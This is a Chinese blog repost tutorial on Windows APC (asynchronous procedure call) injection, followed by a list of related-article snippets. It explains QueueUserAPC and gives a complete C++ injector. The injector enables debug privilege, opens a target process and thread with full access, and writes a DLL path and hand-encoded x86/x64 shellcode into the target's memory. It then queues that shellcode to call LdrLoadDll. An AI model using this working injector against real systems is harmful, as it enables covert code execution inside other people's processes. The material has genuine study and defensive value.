注入(2)--APC(Asynchronous Procedure Call)注入(异步过程调用)

最新推荐文章于 2022-01-18 09:54:30 发布
最新推荐文章于 2022-01-18 09:54:30 发布
阅读量137 收藏
点赞数
原文链接:http://www.cnblogs.com/Toring/p/6628284.html
版权

APC(Asynchronous Procedure Call,异步过程调用)是在一个特定线程环境下被异步执行的函数,分为用户模式APC和内核模式APC。每个线程都有一个APC队列。在用户模式下,当线程调用SleepEx、WaitForSingleObjectEx等进入"Alterable WaitStatus"状态(可警告的等待状态)的时候,系统会遍历该进程的APC队列,然后按照先进先出的顺序来执行这些APC。

在用户模式下,微软提供了QueueUerAPC这个API来向一个线程插入APC。

声明如下:
WINBASEAPI
DWORD
WINAPI
QueueUserAPC(
    _In_ PAPCFUNC pfnAPC,
    _In_ HANDLE hThread,
    _In_ ULONG_PTR dwData
    );
pfnAPC:指向一个APC函数
hThread:将要插入APC的线程句柄
dwData:APC函数的参数

先右键项目,点击属性->链接器->系统->子系统 选择窗口(/SUBSYSTEM:Windows)
然后将_tmain()函数改为WinMain()函数

// LoadExe.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include <Windows.h>
#include <iostream>
using namespace std;

typedef struct _UNICODE_STRING
{
	USHORT				Length;
	USHORT				MaximumLength;
	PWSTR					Buffer;
} UNICODE_STRING, *PUNICODE_STRING;


typedef struct _INJECT_STRUCT {
	UINT_PTR               LdrLoadDllAddress;   //4
	UNICODE_STRING DllFullPath;   //4,4
	HANDLE                 OutHandle;
} INJECT_STRUCT, *PINJECT_STRUCT;

int GrantDebugPrivileges();
BOOL InjectByAPC(int ProcessID,int ThreadID,const char *szDllFullPath);
UINT32 MakeShellCode(UINT8* ShellCodeData, PVOID Address);


int WINAPI WinMain(HINSTANCE  hInstance,HINSTANCE  hPrevInstance,LPSTR  lpCmdLine,int nCmdShow)
{
	int ProcessID = 0;
	int ThreadID = 0;

	if (__argc < 2)
	{
		return -1;
	}
	if (!strcmp(__argv[1], "Inject"))
	{

		GrantDebugPrivileges();
		ProcessID = atoi(__argv[2]);
		ThreadID = atoi(__argv[3]);
		return InjectByAPC(ProcessID, ThreadID, __argv[4]);
	}
	return 0;
}

int GrantDebugPrivileges()
{
	HANDLE TokenHandle = NULL;
	TOKEN_PRIVILEGES PrivilegesToken;
	LUID v1;
	int iRet;

	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &TokenHandle))
	{
		return 0;
	}

	if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &v1)) 
	{
		CloseHandle(TokenHandle);
		return 0;
	}
	PrivilegesToken.PrivilegeCount = 1;
	PrivilegesToken.Privileges[0].Luid = v1;
	PrivilegesToken.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

	iRet = AdjustTokenPrivileges(TokenHandle, FALSE, &PrivilegesToken, sizeof(PrivilegesToken), NULL, NULL);
	CloseHandle(TokenHandle);

	return iRet;
}


BOOL InjectByAPC(int ProcessID,int ThreadID,const char *szDllFullPath)
{
	HANDLE ProcessHandle = NULL;
	HANDLE ThreadHandle = NULL;
	if (ProcessID <= 0 || ThreadID < 0)
	{
		return FALSE;
	}
	printf("Success\r\n");
	ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessID);    //打开系统所有进程
	if (ProcessHandle == NULL) 
	{
		return FALSE;
	}

	if (ThreadID > 0) 
	{
		ThreadHandle = OpenThread(THREAD_ALL_ACCESS, FALSE, ThreadID);//打开所有线程
		if (ThreadHandle == NULL) 
		{
			CloseHandle(ProcessHandle);
			return FALSE;
		}
	}

	//注入都要在目标进程空间中申请内存  写入Dll的绝对路径
	UINT32 DllPathLength = 0;
	DllPathLength = (UINT32)strlen(szDllFullPath);
	WCHAR* wzDllFullPath = (WCHAR*)calloc(1, (DllPathLength + 1) * sizeof(WCHAR));   //在LoadEx进程空间中
	if (wzDllFullPath == NULL) 
	{

		return FALSE;
	}
	for (int i=0;i<DllPathLength;i++)
	{
		wzDllFullPath[i] = (UINT16)szDllFullPath[i];
	}

	//单字转换双字

	WCHAR* wzDllFullPathData = (WCHAR*)VirtualAllocEx(ProcessHandle, NULL, (wcslen(wzDllFullPath) + 1) * sizeof(WCHAR), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
	if (wzDllFullPathData == NULL) 
	{
		free(wzDllFullPath);
		wzDllFullPath = NULL;
		return FALSE;
	}
	SIZE_T ReturnSize = 0;
	if (!WriteProcessMemory(ProcessHandle, wzDllFullPathData, wzDllFullPath, (wcslen(wzDllFullPath) + 1) * sizeof(WCHAR), &ReturnSize)) 
	{

		free(wzDllFullPath);
		wzDllFullPath = NULL;

		return FALSE;
	}
	LPVOID LdrLoadDll;
	LdrLoadDll = GetProcAddress(GetModuleHandleA("ntdll.dll"), "LdrLoadDll");   //LadrloadDll导出地址

	INJECT_STRUCT InjectStruct = {0};

	InjectStruct.LdrLoadDllAddress = (UINT_PTR)LdrLoadDll;
	InjectStruct.DllFullPath.Buffer = wzDllFullPathData;
	InjectStruct.DllFullPath.Length = InjectStruct.DllFullPath.MaximumLength = (USHORT)(wcslen(wzDllFullPath) * sizeof(WCHAR));

	PINJECT_STRUCT InjectStructData = NULL;
	//注:VirtualAllocEx()函数是在别人的内存空间中申请内存
	InjectStructData = (PINJECT_STRUCT)VirtualAllocEx(ProcessHandle, NULL, sizeof(INJECT_STRUCT), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
	if (InjectStructData == NULL)
	{
		free(wzDllFullPath);
		wzDllFullPath = NULL;

		return FALSE;
	}

	if (!WriteProcessMemory(ProcessHandle, InjectStructData, &InjectStruct, sizeof(INJECT_STRUCT), &ReturnSize))
	{
		free(wzDllFullPath);
		wzDllFullPath = NULL;

		return FALSE;
	}
	char szShellCode[64] = {0};
	UINT32  ShellCodeSize  = MakeShellCode((UINT8*)szShellCode, InjectStructData);

	CHAR* szShellCodeData = NULL;
	szShellCodeData =(CHAR*)VirtualAllocEx(ProcessHandle, NULL, ShellCodeSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (szShellCodeData == NULL) 
	{
		free(wzDllFullPath);
		wzDllFullPath = NULL;
		return FALSE;
	}

	if (!WriteProcessMemory(ProcessHandle, szShellCodeData, szShellCode, ShellCodeSize, &ReturnSize)) 
	{
		free(wzDllFullPath);
		wzDllFullPath = NULL;

		return FALSE;
	}

	if (ThreadHandle)
	{

		if(!QueueUserAPC((PAPCFUNC)szShellCodeData,ThreadHandle, (ULONG_PTR)InjectStructData))
		{
			free(wzDllFullPath);
			wzDllFullPath = NULL;
			return FALSE;
		}
	}

	free(wzDllFullPath);
	wzDllFullPath = NULL;
	return TRUE;
}

UINT32 MakeShellCode(UINT8* ShellCodeData, PVOID Address)
{
#ifndef _WIN64
	ShellCodeData[0] = 0xb8;        // mov eax, InjectStructData
	memcpy(&ShellCodeData[1], &Address, sizeof(Address));
	ShellCodeData[5] = 0x53;		// push ebx                     //保存ebx
	ShellCodeData[6] = 0x8d;		// lea ebx, InjectStructData+offsetof(INJECT_STRUCT.OutHandle)
	ShellCodeData[7] = 0x58;
	ShellCodeData[8] = (UINT8)offsetof(INJECT_STRUCT, OutHandle);
	ShellCodeData[9] = 0x53;		// push ebx ; ModuleHandle arg
	ShellCodeData[10] = 0x8d;		// lea ebx, InjectStructData+offsetof(INJECT_STRUCT.DllFullPath)
	ShellCodeData[11] = 0x58;
	ShellCodeData[12] = (UINT8)offsetof(INJECT_STRUCT, DllFullPath);
	ShellCodeData[13] = 0x53;		// push ebx ; ModuleFileName arg
	ShellCodeData[14] = 0x6a;		// push 0 (flags arg)
	ShellCodeData[15] = 0x00;
	ShellCodeData[16] = 0x6a;		// push 0 (PathToFile arg)
	ShellCodeData[17] = 0x00;
	ShellCodeData[18] = 0x8b;		// mov ebx, InjectStructData+offsetof(INJECT_STRUCT.LdrLoadDllAddress)
	ShellCodeData[19] = 0x58;
	ShellCodeData[20] = (UCHAR)offsetof(INJECT_STRUCT, LdrLoadDllAddress);
	ShellCodeData[21] = 0xff;		// call ebx
	ShellCodeData[22] = 0xd3;
	ShellCodeData[23] = 0x5b;		// pop ebx
	ShellCodeData[24] = 0xc2;		// retn 0x4
	ShellCodeData[25] = 0x04;
	ShellCodeData[26] = 0x00;
	return 27;
#else
	ShellCodeData[0] = 0x53;		// push rbx
	ShellCodeData[1] = 0x48;		// sub rsp, 0x20
	ShellCodeData[2] = 0x83;
	ShellCodeData[3] = 0xec;
	ShellCodeData[4] = 0x20;
	ShellCodeData[5] = 0x48;		// mov rax, rcx (InjectStructData)
	ShellCodeData[6] = 0x8b;
	ShellCodeData[7] = 0xc1;
	ShellCodeData[8] = 0x48;		// lea rbx, Address+offsetof(INJECT_STRUCT.OutHandle)
	ShellCodeData[9] = 0x8d;
	ShellCodeData[10] = 0x58;
	ShellCodeData[11] = (UINT8)offsetof(INJECT_STRUCT, OutHandle);
	ShellCodeData[12] = 0x49;		// mov r9, rbx ; ModuleHandle arg
	ShellCodeData[13] = 0x89;
	ShellCodeData[14] = 0xd9;
	ShellCodeData[15] = 0x48;		// lea rbx, injstructaddr+offsetof(INJECT_STRUCT.DllFullPath)
	ShellCodeData[16] = 0x8d;
	ShellCodeData[17] = 0x58;
	ShellCodeData[18] = (UINT8)offsetof(INJECT_STRUCT, DllFullPath);
	ShellCodeData[19] = 0x49;		// mov r8, rbx ; ModuleFileName arg
	ShellCodeData[20] = 0x89;
	ShellCodeData[21] = 0xd8;
	ShellCodeData[22] = 0x48;		// xor rdx, rdx ; Flags arg    
	ShellCodeData[23] = 0x31;
	ShellCodeData[24] = 0xd2;
	ShellCodeData[25] = 0x48;					// xor rcx, rcx ; PathToFile arg
	ShellCodeData[26] = 0x31;
	ShellCodeData[27] = 0xd1;
	ShellCodeData[28] = 0x48;					// mov rbx, Address+offsetof(INJECT_STRUCT.LdrLoadDllAddress)
	ShellCodeData[29] = 0x8b; 
	ShellCodeData[30] = 0x58;
	ShellCodeData[31] = (UINT8)offsetof(INJECT_STRUCT, LdrLoadDllAddress);
	ShellCodeData[32] = 0xff;					// call rbx
	ShellCodeData[33] = 0xd3;
	ShellCodeData[34] = 0x48;					// add rsp, 0x20
	ShellCodeData[35] = 0x83;
	ShellCodeData[36] = 0xc4;
	ShellCodeData[37] = 0x20; 
	ShellCodeData[38] = 0x5b;					// pop rbx
	ShellCodeData[39] = 0xc3;					// ret
	return 40;
#endif
}

 

转载于:https://www.cnblogs.com/Toring/p/6628284.html

weixin_34356310
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 八十五.《Windows黑客编程技术详解》之注入技术详解(全局钩子、远线程钩子、突破Session 0注入APC注入
杨秀璋的专栏
06-25 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点,希望对您有所帮助。第二篇文章主要介绍4种常见的注入技术,包括全局钩子、远线程钩子、突破SESSION 0隔离的远线程注入APC注入,案例包括键盘钩子、计算器远线程注入实现、APC注入等,希望对您有所帮助。
win32多线程-异步过程调用(asynchronous Procedure Calls, APCs)
程序人生的专栏
07-29 1942
使用overlapped I/O并搭配event对象-----win32多线程-异步(asynchronous) I/O事例,会产生两个基础性问题。 第一个问题是,使用WaitForMultipleObjects(),你只能等待最多达MAXIMUM_WAIT_OBJECTS个对象,在Windows NT中此值最大为64。 第二个问题是,你必须不断根据“那一个handle被激发”而计算如何反应。
通过异步过程调用(APC)注入DLL
07-02 703
关于APC的介绍,可以参考MSDN对Asynchronous Procedure Calls的介绍(索引APCs),下面是简单翻译的一段文字。 APCAsynchronous Procedure Calls,异步过程调用)是指在一个特定的线程环境中异步的执行代码。当一个APC被添加到一个线程的APC队列的时候,系统会产生一个软中断;当线程下一次被调度的时候APC函数将被执行。操作系统产生的AP
异步过程调用(Asynchronous Procedure Call)
雪儿的专栏
07-25 722
/*Demonstrates how to use APC's(asynchronous procedure calls)instread of signaled objects to service multiple outstanding overlapped operations on a file*/ #define WIN32_LEAN_AND_MEAN #include #i
Asynchronous Procedure Calls
云淡风轻
01-05 1274
<br />这两天在看APC的东西,顺便写个总结:<br />1 要注意在线程刚创建但还没开始第一次运行时(如果是给了CREATE_SUSPENDED就不会这样了),如果给线程投递APC(QueueUserAPC),那么只要APC函数没执行完,真正的线程函数就不会执行。大家可以写个例子,创建完线程立即给它不停的发APC,它将一直执行APC函数。<br />2 QueueUserAPC函数一般不会出错(参数正确的话),出错的话就是ERROR_NOT_ENOUGH_MEMORY。<br />3 当线程函数开始执
使用异步过程调用APC)实现模块注入
Java技术博文
10-22 1106
摘自:windows编程循序渐进              异步过程调用是一种能在特定线程环境中异步执行的系统机制。往线程APC队列添加APC,系统会产生一个软中断。在线程下一次被调度的时候,就会执行APC函数,APC有两种形式,由系统产生的APC称为内核模式APC,由应用程序产生的APC被称为用户模式APC。        每个线程都拥有自己的APC队列。应用程序可以使用函数把APC添加到指
易语言 注入源码 大全 远程线程注入 消息钩子注入 输入法注入 注册表注入 IAT永久注入 进程暂停注入 apc注入
11-20
涉及到多种注入技术,包括远程线程注入、消息钩子注入、输入法注入、注册表注入以及IAT(Import Address Table)永久注入和进程暂停注入APCAsynchronous Procedure Call)注入。 首先,让我们逐一了解这些注入...
易语言移植的APC注入源码
06-06
APCAsynchronous Procedure Call)是Windows API提供的一种异步处理机制,常用于线程间的通信。在易语言中实现APC注入,意味着开发者使用易语言这种中文编程语言,将APC注入的技术应用到了程序设计中。 首先,...
apc.rar_APC_APC 调用_QueueUserAPC _queueuserapc pudn_空态APC
09-24
在Windows操作系统中,异步过程调用Asynchronous Procedure Call, APC)是一种线程间通信的方式,用于在不同优先级的上下文中执行回调函数。APC分为两种类型:用户态APC(User-Mode APC)和核心态APC(Kernel-Mode...
Win7 64位 注入工具
01-29
想必搜索到这里你也是遇到Win7下注入失败的问题,错误代码返回5,errolookup里显示为"拒绝访问",用这个工具可以解决这个问题。 博文在这里: http://blog.csdn.net/cwangchao/article/details/8553831
并发学习之:APC异步过程调用
weixin_30586085的博客
01-07 112
一个简单的APC例子,对应于Windows 并发编程指南p124。 #include "stdafx.h" #include <stdio.h> #include <windows.h> VOID NTAPI ApcFunc(ULONG_PTR pValue) { printf("Hello, this is APC and the parame...
异步过程调用Asynchronous Procedure Calls,APCs)
sirria1的专栏
03-17 756
转载自【win32多线程程序设计】 译者--侯捷 增加了部分笔记内容 使用 overlapped  I/O 并搭配 event  对象,会产生两个基础性问题。 第一个问题是,使用 WaitForMultipleObjects(),你只能够等待最多达 MAXIMUM_ WAIT_OBJECTS 个对象。在  Windows NT 3.x  和 4.0  所提供的 Win32  SDK 中,此最
Windows异步过程调用(APC)
https://github.com/JelinYao
03-01 4407
原文转载自:http://blog.sina.com.cn/s/blog_6c617ee301017nhr.html,感谢原作者。 apc可以看成就是内核里的定时器,为了给自己一个在本函数返回后还能执行的一次机会,有很多操作是需要在函数返回后才能执行. 类似于析构函数但不完全是。 apc的最大特点就是在本函数返回后才执行,而且是在本线程中。 而内核提供的原生的定时器,执行的
OSR文档:NT中的异步过程调用(APC)
zafair的专栏
10-28 3351
在Windows NT中,APC被无数次地提到,但在标准Microsoft DDK中却没有说明什么是APC以及应该怎么使用。但是理解APC是理解Windows NT怎么工作的本质。     当然,毫无疑问你们一定知道一些完全支持APC的Win32 API(比如QueueUserApc这个Win32 API函数)。Windows NT平台的Win32 APC抽象是建立在内核中的本地APC支持之上的。
APC异步过程调用
kernweak的博客
09-03 2453
线程是不能被“杀掉”、“挂起”、“恢复”的,线程在执行的时候自己占据着CPU,别人怎么可能控制它呢? 举个极端的例子:如果不调用API,屏蔽中断,并保证代码不出现异常,线程将永久占用CPU,何谈控制呢?所以说线程如果想“死”,一定是自己执行代码把自己杀死,不存在“他杀”这种情况! 那如果想改变一个线程的行为该怎么办呢? 可以给他提供一个函数,让它自己去调用,这个函数就是APC(Asyncro...
.net core 异步注入写法
weixin_42401291的博客
01-18 517
1.构造 IServiceProvider _serviceProvider; 2.引用拓展 using Microsoft.Extensions.DependencyInjection; 3.异步使用 await Task.Run(async () => { using (var Context = (Context)_serviceProvider.CreateScope().ServiceProvi...
解决SpringBoot/Spring在异步中无法注入实例问题
涅 槃——沉默、寡言、静思、实干
09-17 1551
   在Spring的全家桶中,使用@Autowired关键字无可避免,但是在异步中若是直接注入的话,会出现空指针异常,即注入不成功。    那究竟该如何注入了: import org.springframework.beans.BeansException; import org.springframework.context.ApplicationContext; import org.sp...
Windows APC
keke_zkt的专栏
07-30 751
http://www.cnblogs.com/wpcockroach/archive/2013/05/17/3084681.html APC的全称是Asynchronous Procedure Call,异步过程调用。MSDN链接请猛击这里。用简短的话来总结就是: 每一个线程都有一个APC队列APC分两种,分别是kernel-mode APC和user-mode APC通过
windows apc注入原理
最新发布
06-11
Windows APCAsynchronous Procedure Call)注入是一种常见的注入技术,它利用了 Windows 操作系统中的异步过程调用机制来实现注入。具体原理如下: 1. 创建目标进程 首先,攻击者需要创建一个目标进程,该进程将作为注入目标。一般情况下,攻击者会选择一个易受攻击的进程,例如 Windows Explorer。 2. 分配内存空间 攻击者需要在目标进程中分配一块内存空间,用于存放要注入的代码。可以使用 VirtualAllocEx 等函数来实现。 3. 编写注入代码 接下来,攻击者需要编写注入代码,并将其写入到之前分配的内存空间中。注入代码通常是一个 DLL 文件,其中包含了攻击者想要执行的恶意代码。同时,在注入代码中还需要将恶意代码的入口点指向一个 APC 回调函数。 4. 调用 QueueUserAPC 函数 接下来,攻击者需要在目标进程中的某个线程上调用 QueueUserAPC 函数,并将之前分配的内存空间中的 APC 回调函数作为参数。这样,当目标进程的线程下一次进入 Alertable 状态时,它将执行注入代码中的 APC 回调函数。 5. 触发注入 最后,攻击者需要触发目标进程中的线程进入 Alertable 状态。可以使用 Sleep、WaitForSingleObject 等函数来实现。 总之,APC 注入技术是一种高级的注入技术,攻击者可以通过它将恶意代码注入到目标进程中,并在其中执行。然而,这种技术也有一定的局限性,例如无法注入到特权级较高的进程中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值